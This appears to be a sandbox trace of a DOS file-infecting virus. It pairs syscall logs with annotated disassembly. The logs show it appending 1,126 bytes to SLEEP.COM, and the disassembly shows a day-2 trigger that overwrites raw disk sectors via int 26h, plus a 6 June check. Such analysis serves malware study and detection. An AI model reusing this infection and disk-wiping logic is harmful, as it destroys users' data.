2018-12-25T12:21:16.168890655Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.170758842Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.182771105Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.190061671Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.192899112Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.203158062Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.204836966Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.207214707Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.217406444Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.219800977Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.221372159Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.23071996Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.24162316Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.24525126Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.252817401Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.261237927Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.263813426Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.275017874Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.278242059Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.285734021Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.28887141Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.292560956Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.295850792Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.297977304Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.301978641Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.312095061Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.314490227Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.317153311Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.325871068Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.337256235Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.341477964Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.348794705Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.35595144Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.358749981Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.370161347Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.372122979Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.381074121Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.384991647Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.387851203Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.390724139Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.39286412Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.39528571Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.410977004Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.414732742Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.417292135Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.426219673Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.44659697Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.449036971Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.453565314Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.333587855Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.337071726Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.340280936Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.344610659Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.346096335Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.358158713Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.37167063Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.38015861Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.382649331Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.408790548Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.411646786Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.419170938Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.422351635Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.425238632Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.428719881Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.430030338Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.432380262Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.442702694Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.44571136Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.44795071Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.458497367Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.4706447Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.473447025Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.482100676Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.491917678Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.495178968Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.510254744Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.513893782Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.52220861Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.52754127Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.531712988Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.535311834Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.547998483Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.550769681Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.560622349Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.563284515Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.565073572Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.573932629Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.585441319Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.589232145Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.597399179Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.604373451Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.607655812Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.616049473Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.618392975Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.627316466Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.630896384Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.634201873Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.638356777Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.640796799Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.643621809Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.653019664Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.655566311Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.658445729Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.666938752Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.678103915Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:16.680965315Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.685742519Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.542214913Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:16.544686831Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.548658082Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.553616676Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.555292584Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.569162524Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.582867958Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.59052268Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:16.594240182Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.61496433Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.617363335Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.626383334Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.629519483Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.63278632Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.636088007Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.638396424Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.641988088Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.651881878Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.65565482Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.657398868Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.667453886Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.679201953Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.682963554Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.690867769Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.706472995Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.709096352Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.717212126Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.71919445Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.742971732Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.746636192Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.750451599Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.754151344Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.755906292Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.75876972Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.769425903Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.771626857Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.774107789Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.785268815Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.797086318Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.800506465Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.809181396Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.817625699Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.820476941Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.833686666Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.836163598Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.844065955Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.848691295Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.851972595Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.854985558Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.856676315Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.860778655Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.87042177Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.873031404Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.876185122Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.885430012Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.89663059Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:16.900563263Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.905345513Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.738949219Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:16.741739788Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.745048366Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.749358624Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.750278085Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.757887586Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.765115258Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.772020668Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:16.776277068Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.796942896Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.799040957Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.806954961Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.81438276Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.81719346Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.820988201Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.823279672Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.826120508Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.843608602Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.849570515Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.851296951Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.860321991Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.871730881Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.875131016Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.882590431Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.892331041Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.894688217Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.9058011Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.914090798Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.921765875Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.925508276Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.929715348Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.934124109Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.936305757Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.940089662Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.953420218Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.962204689Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.964544295Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.979109186Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.991377012Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.995649074Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.005730635Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.014568458Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.017110826Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.030325891Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.032578017Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.041192622Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.045600528Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.048868911Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.052123037Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.054850612Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.057219934Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.067118245Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.070643105Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.072691908Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.338362251Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.414569694Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:17.417882208Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.42267887Z 59 PC: 12da6 | Change current directory

